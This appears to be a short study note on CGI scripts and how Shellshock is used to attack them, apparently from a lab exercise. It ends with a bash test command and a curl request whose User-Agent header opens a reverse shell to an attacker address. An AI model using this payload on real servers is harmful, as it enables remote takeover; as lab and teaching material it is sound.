Common Gateway Interface (CGI) helps a web server render dynamic pages and create a customized response for the user making a request via a web application. Used to access other application running on the web server. Middleware between web servers, external databases, and information sources. Kept in the /CGI-bin directory.

Used if

  • webserver must dynamically interact with the user
  • user submits data to the webserver by filling out a form.

Broadly it looks like

  • A directory is created on the web server containing the CGI scripts/applications. This directory is typically called CGI-bin.
  • The web application user sends a request to the server via a URL, i.e, https://acme.com/cgi-bin/newchiscript.pl
  • The server runs the script and passed the resultant output back to the web client

In CGI, HTTP headers become environment variables.

Attacking

The most common attack to CGIs is the using the Shellshock vulnerability that allows execution of unintentional commands using environment variables. Only works in GNU bash up until version 4.3.

When saving a function as a variable the shell function will stop where it is defined to end by the creator. Vulnerable versions of Bash will allow an attacker to execute operating system commands that are included after a function stored inside an environment variable.

A simple test to see if a bash version is running a new bash process process with the exported bash function and continued execution is doing

env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"

We can then run a reverse shell

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.38/7777 0>&1' http://10.129.204.231/cgi-bin/access.cgi